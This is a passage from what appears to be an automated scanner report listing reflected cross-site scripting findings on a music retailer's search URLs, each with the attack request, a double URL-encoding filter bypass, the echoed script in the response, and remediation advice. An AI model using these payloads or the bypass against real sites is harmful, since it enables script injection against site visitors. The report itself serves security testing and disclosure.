Set-Cookie: CFTOKEN=240772428; expires=Sun, 09-Jan-2011 02:39:54 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38080

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Captain Beefheart28100"><script>alert(1)</script>13be6574f33" />
...[SNIP]...

1.96. http://www.insound.com/search/query/Captain%20Beefheart&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Captain%20Beefheart&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload d3d32%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6b225887cc2 was submitted in the REST URL parameter 3. This input was echoed as d3d32</title><script>alert(1)</script>6b225887cc2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Captain%20Beefheartd3d32%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6b225887cc2&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:01 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=43onokf0u6ql6sjudsh2ulacd4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:01 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=110835097; expires=Sun, 09-Jan-2011 02:40:01 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=229857763; expires=Sun, 09-Jan-2011 02:40:01 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38160

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Captain Beefheartd3d32</title><script>alert(1)</script>6b225887cc2</title>
...[SNIP]...

1.97. http://www.insound.com/search/query/Captain%20Onboard&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Captain%20Onboard&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4888a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea84d697d9ca was submitted in the REST URL parameter 3. This input was echoed as 4888a"><script>alert(1)</script>a84d697d9ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Captain%20Onboard4888a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea84d697d9ca&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=temmqj0mmp4c4afn4bsbu3vub3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:50 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=266814025; expires=Sun, 09-Jan-2011 02:39:50 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=505372686; expires=Sun, 09-Jan-2011 02:39:50 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38058

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Captain Onboard4888a"><script>alert(1)</script>a84d697d9ca" />
...[SNIP]...

1.98. http://www.insound.com/search/query/Captain%20Onboard&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Captain%20Onboard&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 867ed%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e06989965620 was submitted in the REST URL parameter 3. This input was echoed as 867ed</title><script>alert(1)</script>06989965620 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Captain%20Onboard867ed%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e06989965620&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=vv8643nlla69p0ips65ih02702; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:58 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=61075873; expires=Sun, 09-Jan-2011 02:39:58 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=530594327; expires=Sun, 09-Jan-2011 02:39:58 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38138

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Captain Onboard867ed</title><script>alert(1)</script>06989965620</title>
...[SNIP]...

1.99. http://www.insound.com/search/query/Carabina%2030%2030&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Carabina%2030%2030&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88245%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef3d995ee735 was submitted in the REST URL parameter 3. This input was echoed as 88245"><script>alert(1)</script>f3d995ee735 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Carabina%2030%203088245%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef3d995ee735&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=k8ibl292745ltv8pa67c8kgtl5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:49 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=164567339; expires=Sun, 09-Jan-2011 02:39:49 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=98443255; expires=Sun, 09-Jan-2011 02:39:49 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Carabina 30 3088245"><script>alert(1)</script>f3d995ee735" />
...[SNIP]...

1.100. http://www.insound.com/search/query/Carabina%2030%2030&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Carabina%2030%2030&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload e439f%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3a8015ddcdf was submitted in the REST URL parameter 3. This input was echoed as e439f</title><script>alert(1)</script>3a8015ddcdf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Carabina%2030%2030e439f%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3a8015ddcdf&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:56 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=l2i83bmohpa3vv8uqsdvoi7bi3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:56 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=239741202; expires=Sun, 09-Jan-2011 02:39:56 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=453952994; expires=Sun, 09-Jan-2011 02:39:56 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37296

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Carabina 30 30e439f</title><script>alert(1)</script>3a8015ddcdf</title>
...[SNIP]...

1.101. http://www.insound.com/search/query/Caralee%20McElroy&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Caralee%20McElroy&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 4ef72%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e65012859d80 was submitted in the REST URL parameter 3. This input was echoed as 4ef72</title><script>alert(1)</script>65012859d80 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Caralee%20McElroy4ef72%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e65012859d80&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:01 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=k6g4r6u8jirorgs3lpjn0qltc6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:01 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=551357029; expires=Sun, 09-Jan-2011 02:40:01 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=202431491; expires=Sun, 09-Jan-2011 02:40:01 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19033

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Caralee McElroy4ef72</title><script>alert(1)</script>65012859d80</title>
...[SNIP]...

1.102. http://www.insound.com/search/query/Caralee%20McElroy&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Caralee%20McElroy&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88d30%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed2ece26075f was submitted in the REST URL parameter 3. This input was echoed as 88d30"><script>alert(1)</script>d2ece26075f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Caralee%20McElroy88d30%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed2ece26075f&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=obges1170a2me9vudfm9i30mq3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:54 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=276600965; expires=Sun, 09-Jan-2011 02:39:54 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=326174043; expires=Sun, 09-Jan-2011 02:39:54 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19017

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Caralee McElroy88d30"><script>alert(1)</script>d2ece26075f" />
...[SNIP]...

1.103. http://www.insound.com/search/query/Caramel&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Caramel&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c641f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e53d985b4f4b was submitted in the REST URL parameter 3. This input was echoed as c641f"><script>alert(1)</script>53d985b4f4b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Caramelc641f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e53d985b4f4b&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=cetmjhfjvf7q57i7bnhsamkbu4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:51 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=526242165; expires=Sun, 09-Jan-2011 02:39:51 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=410096197; expires=Sun, 09-Jan-2011 02:39:51 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18993

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Caramelc641f"><script>alert(1)</script>53d985b4f4b" />
...[SNIP]...

1.104. http://www.insound.com/search/query/Caramel&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Caramel&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 65d67%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5b8a20a80ce was submitted in the REST URL parameter 3. This input was echoed as 65d67</title><script>alert(1)</script>5b8a20a80ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Caramel65d67%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5b8a20a80ce&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=sg0mh72lqtjsuducoehtlbpt94; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:58 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=378862497; expires=Sun, 09-Jan-2011 02:39:58 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=248680778; expires=Sun, 09-Jan-2011 02:39:58 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Caramel65d67</title><script>alert(1)</script>5b8a20a80ce</title>
...[SNIP]...

1.105. http://www.insound.com/search/query/Carbon/Silicon&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Carbon/Silicon&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 668a8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eec519e9d99d was submitted in the REST URL parameter 3. This input was echoed as 668a8"><script>alert(1)</script>ec519e9d99d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Carbon668a8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eec519e9d99d/Silicon&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:01 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=95k0gvbvd89if148q55pie9ab1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: CFID=548545425; expires=Sun, 09-Jan-2011 02:40:01 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=189792977; expires=Sun, 09-Jan-2011 02:40:01 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18990

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Carbon668a8"><script>alert(1)</script>ec519e9d99d" />
...[SNIP]...

1.106. http://www.insound.com/search/query/Carbon/Silicon&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Carbon/Silicon&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 345cd%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee6f039d92e0 was submitted in the REST URL parameter 3. This input was echoed as 345cd</title><script>alert(1)</script>e6f039d92e0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Carbon345cd%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee6f039d92e0/Silicon&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:08 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=8s05jm2gmo8s614j23mo86j4n6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: CFID=519298234; expires=Sun, 09-Jan-2011 02:40:08 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=455530096; expires=Sun, 09-Jan-2011 02:40:08 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19006

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Carbon345cd</title><script>alert(1)</script>e6f039d92e0</title>
...[SNIP]...

1.107. http://www.insound.com/search/query/Cardia&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Cardia&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 67e5f%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e57b4b955292 was submitted in the REST URL parameter 3. This input was echoed as 67e5f</title><script>alert(1)</script>57b4b955292 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Cardia67e5f%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e57b4b955292&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:01 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=susm8tpsb697r5lfd0ckeccsf1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:01 GMT; path=/; domain=.insound.com
